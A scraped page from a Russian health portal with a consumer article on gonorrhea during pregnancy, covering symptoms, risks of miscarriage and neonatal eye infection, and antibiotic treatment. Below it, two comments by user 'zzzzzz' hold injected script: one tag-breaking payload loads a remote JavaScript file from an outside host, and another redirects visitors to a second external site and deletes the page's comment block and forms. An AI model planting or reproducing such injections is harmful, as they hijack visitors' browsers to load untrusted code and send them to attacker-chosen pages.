Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гонорея и беременность. К...  >>  Гонорея и беременность. Как защититься?
 
Обратная связь
 

Гонорея и беременность. Как защититься?

Размер шрифта
07 мая 2014 00:00
  • google_analytics: false
  • Нравится

Венерические заболевания не дремлют! Особенно наша старая знакомая, о которой не принято говорить, – гонорея. Опасна ли она для будущей мамы и ребенка? Каковы ее симптомы и как защититься?

Гонорея и беременность. Как защититься?

Распространенность

Эта серьезная, но излечимая болезнь вызывается бактериями. Она может передаваться от матери к малышу во время родов при отсутствии лечения у первой. Согласно исследованиям, ежегодно гонореей заболевают около 13 тысяч беременных.

Симптомы

Иногда болезнь никак себя не проявляет. Ее зачастую путают с инфекцией мочевого тракта или влагалища. Симптомы включают в себя чувство жжения во время мочеиспускания, обильные выделения из влагалища, в том числе кровянистые, не связанные с менструациями. В 40% случаев гонорею сопровождает хламидиоз, поэтому стоит проверяться на оба заболевания.

Риск для мамы и малыша

Гонорея повышает риск выкидыша и преждевременных родов. При отсутствии лечения повреждаются фаллопиевы трубы, что ведет к бесплодию. Это также увеличивает риск внематочной беременности, опасного состояния, при котором оплодотворенная яйцеклетка прикрепляется вне полости матки. Ребенок может заразиться гонореей во время родов, что проявляется в виде инфекций глаз и, возможно, последующей слепоте.

Лечение

Для лечения гонореи используют антибиотик цефалоспорин. Однако зачастую бактерии устойчивы к данному препарату, что вызывает беспокойство врачей. Лечение должен проходить и половой партнер. Следует воздержаться от занятий сексом, пока не завершится курс лечения.

Читайте больше в нашем спецпроекте «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:54

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Беременность: как обезопасить себя и будущего малыша от вирусов   Худшая еда для беременной   Курение во время беременности сделает вашего ребенка шизофреником   ВИЧ и беременность. Как защититься?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Можно ли подгадать с беременностью?
Мальчик или девочка? 6 мифов!

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.